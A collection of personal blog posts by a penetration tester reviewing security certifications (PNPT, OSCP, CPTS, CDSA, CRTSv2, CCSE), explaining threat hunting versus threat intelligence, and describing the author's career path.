As part of my learning journey through the Hack The Box Certified Defensive Security Analyst (CDSA) certification, I’ve recently explored a fascinating topic—threat hunting. The more I dive in, the more I realize how important it is to distinguish between threat hunting and cyber threat intelligence (CTI). While both disciplines play vital roles in modern cybersecurity programs, they serve different functions and require distinct approaches.

In this inaugural post for my new blog section dedicated to threat hunting, CTI, and threat actors, I want to explore how these two areas intersect, how they differ, and why both are essential to defending against today’s cyber threats.

Understanding Cyber Threat Intelligence (CTI)

Cyber threat intelligence (CTI) is the practice of collecting, analyzing, and disseminating data about current and potential threats. It transforms raw data into actionable insights that help organizations anticipate, prepare for, and respond to cyberattacks.

In short, CTI is about knowing your enemy.

But it’s important to recognize that intelligence is not simply information or data:

• Data is raw and unprocessed (e.g., log entries, IP addresses).
• Information is structured and organized data.
• Intelligence is the final, actionable product derived from analysis.

For CTI to be useful, it must meet three critical conditions:

• Accurate – Is the intelligence reliable and precise?
• Relevant – Does it apply to your environment or industry?
• Timely – Is the information recent and actionable?

Types of Threat Intelligence

CTI is typically categorized into three levels:

• Strategic Intelligence: Focuses on the big picture. It informs long-term security decisions and risk management, and is tailored for executive leadership and senior stakeholders.
• Tactical Intelligence: Focuses on adversary Tactics, Techniques, and Procedures (TTPs). This form of intelligence directly informs security tools and threat-hunting strategies. For example, it may involve mapping known behaviors to the MITRE ATT&CK framework.
• Operational Intelligence: Delivers real-time insights on specific, ongoing threats. This might include dark web chatter, malware analysis, or vulnerabilities currently being exploited.

Traditionally, CTI has operated somewhat independently, producing intelligence reports in isolation. However, modern security teams are increasingly integrating CTI into their overall operations—informing SOC workflows, guiding hunts, and even influencing business strategy.

What Is Threat Hunting?

While CTI focuses on understanding and anticipating threats, threat hunting is the process of actively seeking them out within your environment.

It’s a proactive, hypothesis-driven activity aimed at uncovering hidden adversaries that have bypassed traditional security controls. Unlike incident response, which is reactive and initiated by alerts or alarms, threat hunting is an active pursuit—looking for threats before they announce themselves.

Threat Hunting Triggers

A hunt is typically initiated by one of three drivers:

• Threat Intelligence: For example, a new indicator of compromise (IOC) or known adversary TTPs may prompt an investigation.
• Situational Awareness: Understanding your environment helps define “normal” and detect anomalies that suggest malicious activity.
• Analytics: Behavioral analytics and machine learning models can uncover deviations from expected patterns that warrant a hunt.

Threat hunting closes the loop on threat intelligence—it begins where CTI ends. While CTI provides the “what” and “who”, threat hunting delivers the “where”, “when”, and “how” within your own network.

How They Work Together

Here’s the most important point: threat hunting and CTI are not competing functions—they’re complementary.

CTI:

• Informs defenders about what threats exist.
• Delivers context and patterns.
• Guides strategic planning and tactical defenses.

Threat Hunting:

• Uses CTI as a launchpad.
• Validates whether threats exist in the current environment.
• Actively detects and disrupts adversary activity.

Think of CTI as the compass that points toward potential danger, while threat hunting is the expedition into the jungle to confront it.

Final Thoughts

As organizations face increasingly sophisticated cyber adversaries, both CTI and threat hunting are essential capabilities. Understanding how to transform data into actionable intelligence—and then use that intelligence to proactively seek out threats—is the cornerstone of modern defensive security.

This is just the beginning of my journey into the world of threat hunting and CTI. Stay tuned as I dive deeper into techniques, frameworks like MITRE ATT&CK, case studies, and insights into the ever-evolving threat landscape.

After months of dedication and late nights, I’ve earned what I call the Trifecta of Penetration Testing Certifications: the PNPT, OSCP, and CPTS. In this post, I’ll break down each certification—covering content, pricing, exam duration, realism, and difficulty—based on my personal journey. If you’re debating which cert to pursue, I hope this guide helps.

Overview of Each Certification

🔴 PNPT – Practical Network Penetration Tester

• Provider: TCM Security
• URL: certifications.tcm-sec.com/pnpt
• Cost: $499 USD (includes training and exam)
• Duration: 5-day engagement + 2 days for reporting
• Content Focus:
  • External/Internal recon and exploitation
  • Active Directory attacks
  • OSINT
  • Pivoting
  • Report writing
• Exam Format: Realistic corporate AD environment; compromise the domain controller and submit a professional report.

🟠 OSCP – Offensive Security Certified Professional

• Provider: Offensive Security
• URL: offsec.com/courses/pen-200
• Cost: Starts at $1749 USD (90-day lab + exam)
• Duration: 24-hour exam + 24 hours for reporting
• Content Focus:
  • Report writing for Penetration Testers
  • Web, Linux, and Windows exploitation
  • Active Directory
  • Tunneling and pivoting
• Exam Format: 1 AD set worth 40 pts + 3 standalone machines (20 pts each); 70 pts minimum to pass with a detailed report.

🟢 CPTS – Certified Penetration Testing Specialist

• Provider: Hack The Box
• URL: academy.hackthebox.com
• Cost: $490 USD (includes training and exam)
• Duration: 10-day exam window plus reporting
• Content Focus:
  • External to internal compromise
  • Black box web, external and internal penetration testing
  • Initial access, privilege escalation, lateral movement
  • Real-world exploitation
• Exam Format: Entire AD network compromise; 12 out of 14 flags required to pass + commercial-grade report.

🧭 My Journey and Timeline

• ✅ PNPT – Passed on 11/6/2023 For the PNPT, one aspect that makes it feel even more realistic is that you’re required to present a debrief of your findings to a TCM Security staff member, just like you would in a real-world engagement.

• ✅ OSCP – Passed on 1/15/2024 The OSCP is one of the most sought-after penetration testing certifications in the industry, and having it on your resume is a significant advantage.

• ✅ CPTS – Passed on 7/25/2024 The CPTS is the new cool kid on the block, and in a few years, it will become the go-to standard for penetration testing certifications in the industry.

Difficulty Comparison

From my perspective:

1. CPTS was the hardest. The 10-day format might sound forgiving, but the depth, chaining of attacks, and report requirements make this a true test of endurance and skill. I captured 13 out of 14 flags before exhaustion kicked in and I pivoted to the report.

2. OSCP is next in difficulty, primarily due to the 24-hour limit. It’s a mental marathon with limited sleep and high pressure to gather at least 70 points. My approach was to take down the AD set first, then secure 2 standalone boxes for 80 points total.

3. PNPT is the most accessible in terms of pressure. You have a full five days to think strategically and take breaks. The environment is realistic and the report matters more than point scoring.

🌍 Realism of the Lab Environments

• 🥇 CPTS – The most realistic enterprise-level environment. Every step is chained and deliberate, mimicking real-world penetration testing.
• 🥈 PNPT – Well-designed, simulates a small business network with a full AD deployment and real attack surfaces.
• 🥉 OSCP – Feels more CTF-oriented. Many machines are vulnerable to older CVEs and less representative of modern enterprise defense apart from the AD portion.

📊 Summary Table

🎯 Which One Should You Take?

• OSCP: Best for getting past HR filters and landing interviews. It’s still the gold standard in the industry for recognition.
• CPTS: Ideal if you’re focused on becoming a skilled pentester. You’ll get top-tier technical experience at a great price.
• PNPT: Excellent for learning real-world pentesting methodology. If you value practical reporting and an instructional experience, this is for you.

🧩 Final Thoughts

Earning all three certs has taught me more than just technical skills—it’s tested my mindset, patience, and professionalism. Each one offers unique lessons and benefits, and together they cover a wide range of what modern offensive security roles require.

No matter which path you take, prepare well, practice often, and always strive to learn during the process.

Got questions about these certs? Feel free to reach out!

As someone who primarily walks the path of the Red Team, I’ve always been immersed in penetration testing, adversarial simulation, and offensive operations. But lately, I’ve realized something crucial — truly mastering offensive security requires seeing things from the defender’s perspective too. That’s why I decided to take on the Hack The Box Certified Defensive Security Analyst (CDSA) certification.

🛡️ What is HTB CDSA?

The HTB Certified Defensive Security Analyst (CDSA) is a highly hands-on certification offered by (Hack The Box ). It focuses on security analysis, SOC operations, and incident handling at an intermediate level. Unlike many traditional certifications that focus on theory, CDSA emphasizes practical, real-world skills — the kind you’ll actually need working in or alongside a SOC.

By earning this cert, one proves they have a strong technical understanding of blue team practices and can navigate the defensive side of cybersecurity with confidence.

📚 Knowledge Domains Covered

The CDSA certification evaluates knowledge and skills across the following domains — many of which are highly complementary to offensive operations:

• SOC Processes & Methodologies
• SIEM Operations (ELK/Splunk)
• Tactical Analytics
• Log Analysis
• Threat Hunting
• Active Directory Attack Analysis
• Network Traffic Analysis (Incl. IDS/IPS)
• Malware Analysis
• DFIR Operations

This depth and range make it a valuable addition to my skillset, especially in understanding how real-world defenses are structured and how attacks are detected and responded to.

🔄 Why I Decided to Pursue a Blue Team Certification

Although my primary focus has always been red teaming and penetration testing, I’ve come to understand that to be an effective offensive security professional, I must also understand how defenders think and operate.

Learning how security analysts detect, respond to, and analyze attacks provides invaluable insight that can level up offensive tradecraft. Knowing what alerts you trigger, how logs are analyzed, and how incidents are handled gives you the upper hand in crafting stealthier, more effective attacks — and also helps when communicating findings with SOC teams during engagements.

This path isn’t just for blue teamers — it’s also a powerful resource for anyone in offensive security.

🚧 Progress So Far

At the time of writing, the SOC Analyst role path on HTB is divided into 15 modules. So far, I’ve completed the first 3 modules, with 12 more to go. I’m learning a lot of new material, especially about SOC operations, which is already making me think differently about logs and telemetry.

🗓️ Estimated completion time per HackTheBox Academy: 23 days

Here’s a look at the module list:

1. Incident Handling Process
2. Security Monitoring & SIEM Fundamentals
3. Windows Event Logs & Finding Evil
4. Introduction to Threat Hunting & Hunting With Elastic
5. Understanding Log Sources & Investigating with Splunk
6. Windows Attacks & Defense
7. Intro to Network Traffic Analysis
8. Intermediate Network Traffic Analysis
9. Working with IDS/IPS
10. Introduction to Malware Analysis
11. JavaScript Deobfuscation
12. YARA & Sigma for SOC Analysts
13. Introduction to Digital Forensics
14. Detecting Windows Attacks with Splunk
15. Security Incident Reporting

Each of these modules builds on the last, and they combine theory with practical labs and real-world scenarios. It’s been an engaging experience so far.

🎯 My Plan Moving Forward

The goal is clear — complete the full role path and then take on the CDSA exam.

The exam itself spans 7 days, which means preparation is key — not just technically, but mentally too. HTB is known for challenging, real-world exams that demand focus, patience, and persistence.

Once I complete the exam, I’ll be sharing a follow-up blog post detailing:

• Lessons learned
• Skills gained
• Full exam experience

So stay tuned for that!

Thanks for reading — and if you’re also considering improving your defensive skills (whether you’re red team or blue team), the CDSA path might be worth exploring. Understanding both sides of the cyber battlefield is what truly builds a well-rounded operator.

CRTSv2 Certification Review – Final Thoughts After Passing the Exam

This post is the second and final part of my review of the (CRTSv2 ) certification by CyberWarFare Labs. In the first part, I covered my experience during the course. This post will wrap things up with a full breakdown of the lab, exam, preparation, and how it stacks up against similar certs.

Table of Contents

• Course Material
• Lab Experience
• Exam
• Preparation
• Comparison
• Final Thoughts

Course Material

The course is divided into two main modules:

Module 1: Initial Access

This section uses real-world case studies to demonstrate how initial access can be achieved through:

• Abusing web application vulnerabilities
• Leaked PAT (Personal Access Token) to self-hosted GitLab Runner
• Adversary-in-the-Middle (AiTM) attacks
• Manipulating Exchange Rules
• Abusing and impersonating enterprise applications like Zoom and Visual Studio

Module 2: Advanced Active Directory Attacks

Although I’ve completed both the CRTP and CRTE from Altered Security, I still learned a lot—especially about AD Certificate Services.

Topics include:

1. Kerberos Delegation

• Extensions:
  • S4U2Self
  • U2U
  • S4U2Self + U2U
• Attacks:
  • Diamond Tickets
  • Sapphire Tickets

2. Linux Active Directory

• Credential Discovery
• Kerberos in Linux
• Credential Extraction

3. Group Managed Service Account (gMSA)

• Machine & User Access

4. Certificate Services

• Authentication & Abuse of ESC1, ESC4, ESC6, ESC8
• Golden Certificate Attacks
• Shadow Credentials
• Un-PAC the Hash

5. Cross-Forest Attacks

• Kerberoasting
• ACL Abuse
• Foreign Security Principal
• Trust Key Abuse
• PAM (Privileged Access Management)
• Over-Permissive Certificate Templates

Lab Experience

The lab was fun, practical, and filled with learning opportunities. You get 30 days of access via the Cyber Range portal.

Before starting the lab, you’re given access to the LMS with course PDFs and video content. Once you’re ready, you request lab access and download the OpenVPN config from the portal.

The lab mimics a Red Team engagement within an Electric PowerGrid Facility. Although the theme is OT/ICS, all attacks are IT-focused.

CRTSv2 Cyber Range

The Cyber Range includes 2 unique attack paths, both mapped to MITRE ATT&CK. There are challenge questions along the way to help track your progress.

Path 1: External to Internal Access

Covers a stack including:

• Exchange Servers, CI/CD Stack, MFA-Protected Apps
• Custom Web Apps & Databases, Firewall Segmentation
• Bastion Hosts, Passwordless Authentication & SSO

Path 2: Active Directory & HMI/SCADA Focus

Goal: Reach the Human Machine Interface (HMI) system. Super fun and the most realistic part of the lab.

Tech stack includes:

• AD DS, CS, Managed Service Accounts
• Patched Windows & Linux Servers
• Bastion Hosts, Firewall Segmentation
• ICS Application Simulation

Exam

Cyberwarfare Labs recently launched a self-serve exam portal, and I was probably the first to book through it 😄

• Duration: 24 hours hands-on + 24 hours for report writing
• Objective: Exfiltrate a sensitive file from the target environment
• Environment: Stable – never needed to reset the lab
• Report: Not covered in the course, so prior experience is assumed

I started on March 28th at 10AM local time and completed the assessment in about 10 hours (with breaks). The exam felt very real-world focused. Chaining multiple vulnerabilities across domains, jumping between different systems, and simulating a full adversary campaign felt natural and challenging.

If you’ve done CRTP, CRTE, or CPTS (like I have), you’ll definitely feel better prepared.

Preparation

My prep strategy looked like this:

• Fully reviewed all PDFs and videos from the LMS
• Practiced every technique multiple times in the lab
• Created a personal cheat sheet on AD exploitation (soon to be shared on my GitHub)
• Reviewed HTB Academy modules on AD Enumeration & Attacks
• Read additional blog posts recommended within the course materials

Highly recommend investing time into the labs, not just to pass the exam, but to truly grasp each concept.

Comparison

Compared to other AD-heavy certs like CRTP and CRTE:

• CRTP/CRTE = assume-breach style (internal access from the start)
• CRTSv2 = full cyber kill chain, from external to internal compromise

CRTSv2 stands out for its realistic adversary simulation, requiring you to leverage multiple attack vectors from initial access to domain dominance.

Final Thoughts

Highly recommended. 💯

• Great price point (especially when discounts are available)
• Labs are realistic, immersive, and educational
• The exam feels like a real Red Team engagement
• Targeted at intermediate/advanced professionals in offensive security

If you’re just getting started, I’d suggest beginning with something like CRTA to get your AD fundamentals in place.

If you’re into Red Teaming and AD exploitation, CRTSv2 should definitely be on your radar. I’ve gained a ton from this course and will absolutely apply it in real-world assessments.

If you have any questions, feel free to reach out or connect with me on (LinkedIn ) or (Twitter ).

Stay sharp.

My Journey Through the Certified Red Team Specialist (CRTS v2) Course

After successfully completing CRTS v1, I decided to take on CRTS v2 by Cyber Warfare Labs. This blog post will document my journey as I work through the course material and prepare for the hands-on exam by the end of March.

My Experience with CRTS v1

In the previous version of this course, the lab covered the following scenarios:

• Red Team assessment in a Nuclear Facility
• Covert operations simulating a nuclear meltdown
• Following the Red Team cycle in multi-segregated networks
• Three unique attack paths mapped to MITRE ATT&CK for Enterprise

To earn the CRTS badge, I had to complete all three attack paths and successfully exfiltrate a critical file from one of the servers. The proof of completion was a screenshot of the file contents, which I had to share with their support team.

While the lab was immersive, I faced some technical bugs that required back-and-forth communication with their support team. Despite these challenges, I managed to complete it and earn my shiny CRTS badge. (Check my Accredible Badge here )

CRTS v2 – What’s New?

The CRTS v2 course and lab introduce updated real-world attack scenarios, including:

• Adversary simulation in an Electric Power Grid facility
• Active Directory (AD) Domain & Certificate Services, Exchange, SSO, MFA & VDI Exploitation
• Following the Red Team cycle in multi-segregated networks
• Two unique attack paths mapped to MITRE ATT&CK for Enterprise

To earn the CRTS v2 Accredible badge, I will need to pass a 24-hour hands-on exam, followed by submitting a detailed exam report within the next 24 hours. A 70% passing score is required to obtain certification.

Why I Chose CRTS v2

Although I already earned CRTS v1, I decided to take v2 because of its updated content and real-world relevance. The lab case studies are modeled after the MGM attack (September 2023), making the course even more relevant to modern Red Team engagements. (You can read about this article here )

During the launch webinar, the course author discussed cybersecurity predictions for 2024, highlighting emerging attack vectors such as:

• CI/CD supply chain attacks
• Exploiting remote access services
• Targeting enterprise-grade software for payload/phishing infrastructure
• Hybrid & multi-cloud attacks
• Sophisticated & stealth attacks in on-premise environments
• Rise in MFA-based attacks
• QR code-based hacking
• Use of GenAI tools for chained attacks

Given the cutting-edge topics covered, upgrading to CRTS v2 was an easy decision—especially since past CRTS v1 holders were offered an upgrade for just $49!

My Future Plans

Once I complete the CRTS v2 exam, I will write an updated review comparing it to other cybersecurity certifications in terms of content depth and exam difficulty. Since the course has a strong Active Directory focus, I will also compare it to Altered Security’s CRTP and CRTE, which I have completed.

Interestingly, I recently read a blog post from one of my LinkedIn connections, where they compared CRTS v2 to OffSec’s OSEP. Given OSEP’s significantly higher price, this comparison makes CRTS v2 even more appealing. (You can read about this article here )

Stay tuned for my CRTS v2 exam experience and final review!

The Certified Cyber Security Engineer (CCSE) is a comprehensive training program offered by Cyber Warfare Labs (CWL) that focuses on real-world penetration testing across 14 distinct domains. Participants gain access to over 50 online labs available 24/7 via the CWL Cyber Security Playground (CCSP). These labs provide hands-on experience with intentionally vulnerable virtual machines, allowing learners to practice market-oriented, practical penetration testing.

My Journey Through the Certified Cyber Security Engineer (CCSE) Course

I recently embarked on the Certified Cyber Security Engineer (CCSE) course by Cyber Warfare Labs, with the goal of completing it and taking the exam by the end of April. While I haven’t completed the course yet, this blog post will document my journey, sharing my thoughts and insights along the way.

Why I Chose the CCSE Course

The CCSE is a relatively new certification, but its content is incredibly up-to-date, covering almost every aspect of penetration testing. From external to internal penetration testing, the curriculum dives into essential topics such as:

• Open-Source Intelligence (OSINT)
• Phishing Infrastructure Setup & Operations
• Web Application Exploitation
• Exploit Development
• Cloud Penetration Testing
• Active Directory Penetration Testing
• WiFi Security
• Mobile Application Exploitation
• Docker Container Exploitation
• And many more!

I was particularly drawn to this course because of its modern and hands-on approach, making it comparable to other well-known certifications such as the PNPT from TCM Security. Additionally, Cyber Warfare Labs frequently offers discounts, and I was able to purchase the course at a 50% discount—an excellent deal for the wealth of knowledge and resources provided.

Initial Impressions

So far, I’ve been enjoying the content. The labs are hands-on and provide real-world scenarios, which I find essential for building practical skills. The course materials include extensive PDF guides and high-quality video lectures that make learning engaging and effective. I appreciate how the course covers a broad spectrum of penetration testing techniques, ensuring that learners gain experience across different domains.

My Plan Moving Forward

As I continue progressing through the course, I plan to take detailed notes and document my experiences with each module. My goal is to complete all the labs, review the materials thoroughly, and be fully prepared to take the exam by the end of April.

Once I complete the CCSE and earn my certification, I will write a follow-up blog post comparing it to the PNPT from TCM Security. This comparison will focus on:

• Course structure
• Hands-on labs
• Exam difficulty
• Overall value for cybersecurity professionals

Stay Tuned!

I’ll be updating my blog with my progress, insights, and final thoughts on the CCSE certification. If you’re considering this course or are currently enrolled in it, I’d love to hear your thoughts! Let’s connect and share our experiences.

A Clear Overview of the CPTS Certification

In this post, I’ll share my experience with the HTB Certified Penetration Testing Specialist (CPTS) certification. Whether you’re new to penetration testing or already familiar with CPTS, there’s something here for everyone.

What is Penetration Testing?

Penetration testing, or pen testing, involves authorized simulated cyberattacks on systems and networks. The goal? To identify and fix vulnerabilities before hackers exploit them. As a pen tester, you’ll document your findings and create reports detailing your approach and results.

What is CPTS?

HTB Certified Penetration Testing Specialist (HTB CPTS) is a hands-on certification from HackTheBox that assesses intermediate-level penetration testing skills. It covers everything from reconnaissance to reporting, ensuring you’re equipped to perform real-world security assessments.

Pricing Options

• General Pricing: Training + exam voucher = $490.
  Alternatively, buy a standalone voucher for $210 but you will also need a total of 1970 cubes to have access to all the modules in the path.
• Annual Subscription: Recommended for professionals, this gives access to all modules (up to Tier IV) and one exam voucher.
• Student Plan: At just $8/month, students can complete the program in ~4 months, totaling $242 plus the exam voucher.

Training & Exam Details

Role Path Overview

To attempt the exam, you must complete the Penetration Tester Job-Role Path on HackTheBox Academy. This path covers core concepts, tools, tactics, and methodologies, broken down into 28 modules. Completion time varies, but it’s estimated at 43 days of full-time effort (8 hours/day).

Key advice:

• Don’t rush. Take notes, revisit concepts, and repeat modules if necessary.
• Take breaks. Avoid burnout by pacing yourself.
• Use HackTheBox’s Discord for community tips and hints when stuck.

It took me 3.5 months to complete this path while balancing work and life.

Extra Practice

Even after completing the path, extra practice on HackTheBox main platform Prolabs can solidify your skills. I completed the Prolab OffShore and found it invaluable for refining my methodologies, although it was overkill since all you need is covered in the Penetration Tester job role path.

HTB CPTS Exam Structure

The Hack The Box Certified Penetration Testing Specialist (CPTS) exam is a fully hands-on assessment designed to evaluate a candidate’s ability to exploit vulnerabilities in a realistic enterprise environment.

Key Features

🔹 Practical, Real-World Focus

The exam requires candidates to identify and exploit security flaws in web applications, network services, and Active Directory, simulating real-world penetration testing scenarios.

🔹 Extended Duration for Comprehensive Testing

Unlike traditional time-constrained exams, the CPTS exam typically spans 10 days. This allows candidates ample time to execute attacks, perform post-exploitation activities, and document their findings thoroughly.

🔹 Professional Reporting Requirement

A critical component of the exam is delivering a commercial grade detailed penetration testing report. Candidates must provide a structured analysis of their findings, including vulnerability descriptions, exploitation techniques, and recommended mitigations. The quality and clarity of the report play a significant role in passing the exam.

🔹 Realistic and Challenging Lab Environment

Built within HTB’s advanced lab infrastructure, the CPTS exam mirrors the complexity of modern enterprise networks. The high level of realism ensures candidates face up-to-date security challenges, closely aligning with real-world penetration testing engagements.

The Exam Experience

The CPTS exam involves:

• Black-box penetration testing on real-world Active Directory network hosted in HTB’s infrastructure.
• 10 days to submit your findings.
• A passing score of 85 points (12 out of 14 flags).

This was the hardest exam I’ve taken so far. It took me two attempts, but I eventually scored 13/14 flags. If you’re active on HTB Discord you must heard of the infamous flag flag 9 which was a real pain and took me few days to find, but perseverance is key.

Pro Tips:

• Keep your approach simple.
• Break challenges into smaller steps.
• Stay calm and use all available resources.

Waiting 20 business days for the results is tough, but the joy of passing makes it all worthwhile.

Final Thoughts

CPTS is not an entry-level certification like OSCP or PNPT—it’s a challenging but rewarding journey that sharpens your skills for professional penetration testing. Totally recommended when it comes to content, pricing and skills you will get out of it. Although not yet recognized at the same level as the OSCP which has been around for a decade, the CPTS is the cert that will give you the skills needed to get the job done.

On my next blog post I will go through a thorough comparison between the CPTS, OSCP and PNPT the Trifecta of pentesting certs.

My path here wasn’t exactly traditional. I started out studying literature in secondary school, which taught me how to think critically and solve problems, skills that turned out to be surprisingly useful in cybersecurity. From there, I earned a Bachelor’s in Electronic Engineering and a Professional Diploma in Computer Engineering before completing a Micromasters in Cybersecurity through Rochester Institute of Technology.

Along the way, I’ve picked up certifications like OSCP, CPTS, PNPT, CWES(aka CBBH), CDSA, CRTE, CRTP, CRTS, CRTA, CCSE and CEH (Practical). These aren’t just letters after my name, they represent years of hands-on work and a commitment to keeping up with how rapidly this field changes.

I started my career in customer service, moved into IT support, and eventually landed in management. These days, I handle both offensive and defensive security, running our organization’s penetration testing program while also thinking about how to defend against the same tactics I use to test our systems.

On this blog, you’ll find my thoughts on cybersecurity challenges, certification reviews, and technical walkthroughs. I’m here to share what’s worked (and what hasn’t) throughout my career. Feel free to look around and reach out if something resonates with you.